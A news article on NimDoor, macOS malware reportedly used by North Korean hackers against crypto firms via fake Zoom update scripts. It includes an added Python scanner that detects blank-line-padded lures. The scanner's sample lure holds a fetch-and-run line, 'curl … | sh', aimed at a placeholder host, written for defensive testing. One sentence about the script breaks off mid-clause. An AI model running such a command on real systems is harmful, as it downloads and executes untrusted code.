
Fake Zoom Updates Used In Crypto Hack Campaign
A North Korean hacking group is behind a new wave of cyberattacks on Web3 and cryptocurrency companies, using a rare type of macOS malware.
In a rush? Here are the quick facts:
- North Korean hackers target crypto firms with advanced macOS malware.
- Malware uses Nim language and fake Zoom updates.
- Victims contacted via Telegram with social engineering.
Researchers at Sentinel Labs have identified this malware family as NimDoor because it utilizes the obscure programming language Nim.
The attack starts with a social engineering trick. The attackers reach their targets through Telegram by impersonating colleagues. They then ask the victims to execute a “Zoom SDK update script” after sending them a fake Zoom meeting link. The malicious script, which contains 10,000 blank lines and a single typo (“Zook” instead of “Zoom”), downloads
Once triggered, the malware downloads and installs several harmful programs, including one that can steal login credentials, browser data, and Telegram chat history. Another script secretly copies users’ system files, Keychain data, and even terminal history, sending it all back to a remote server.
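The lure described above hides its payload below thousands of blank lines so that anyone who opens the "update script" sees only a harmless-looking header. The following scanner is an added example written for this article; it is not code from SentinelOne, the article's author, or the malware. It flags a shell script when an unusually long run of empty lines is followed by a command that fetches or executes remote content, and separately notes the "Zook" typo the article reports. The threshold, the command list, the two sample scripts, and the `example.invalid` host are all constructed assumptions for illustration.

```python
"""Heuristic scanner for blank-line-padded 'update script' lures.

Added example, not code from the original article or from SentinelOne.
Thresholds and sample scripts below are constructed assumptions.
"""
import re

# Assumption: a legitimate script rarely has hundreds of empty lines in a row.
MAX_BLANK_RUN = 500

# Assumed, non-exhaustive list of commands that fetch or run remote content.
FETCH_EXEC = re.compile(r"\b(curl|wget|osascript|python3?|bash|sh)\b")


def longest_blank_run(lines):
    """Return (length, index_of_last_line) of the longest run of empty lines."""
    run = best = best_end = 0
    for i, line in enumerate(lines):
        if line.strip() == "":
            run += 1
            if run > best:
                best, best_end = run, i
        else:
            run = 0
    return best, best_end


def scan_script(text):
    """Return a list of human-readable findings; an empty list means clean."""
    lines = text.splitlines()
    findings = []

    run, end = longest_blank_run(lines)
    if run >= MAX_BLANK_RUN:
        findings.append(f"blank-line padding: {run} consecutive empty lines")
        # Only the part of the script below the padding is examined here,
        # because that is where a padded lure keeps the real payload.
        tail = "\n".join(lines[end + 1:])
        if FETCH_EXEC.search(tail):
            findings.append("fetch/exec command hidden below the padding")

    # The typo the article reports in the lure ("Zook" instead of "Zoom").
    if "Zook" in text:
        findings.append("lure typo 'Zook' present")

    return findings


# Constructed sample inputs (not real malware): a harmless helper and a
# padded lure whose download command sits 10,000 empty lines below the header.
BENIGN = "#!/bin/sh\n# Zoom SDK helper\n\necho 'checking version'\n\nexit 0\n"
LURE = (
    "#!/bin/sh\n# Zook SDK update script\necho 'Updating Zoom SDK...'\n"
    + "\n" * 10000
    + "curl -s http://example.invalid/stage2 | sh\n"
)

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("lure", LURE)):
        print(name, scan_script(script) or ["no findings"])
```

Run it as a file to see both samples scored; in practice the same function can be pointed at any script a user was asked to run before it is executed.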
Unlike most macOS malware, NimDoor uses advanced techniques such as process injection and encrypted WebSocket Secure (wss) communication. These features make it harder to detect, since its traffic to the command servers is encrypted.
A standout feature is its persistence mechanism: even if a user or the system tries to stop the malware, it re-installs itself by handling the termination signals (SIGINT/SIGTERM) that macOS uses to stop a process.
“Threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts,” wrote Sentinel Labs researchers Phil Stokes and Raffaele Sabato. They warn that attackers’ use of Nim and AppleScript, along with fake update lures, shows a new level of sophistication.
Security experts recommend that Web3 and crypto platforms strengthen their security measures and train staff to recognize social engineering, since this campaign shows how attackers exploit trust to penetrate otherwise secure systems.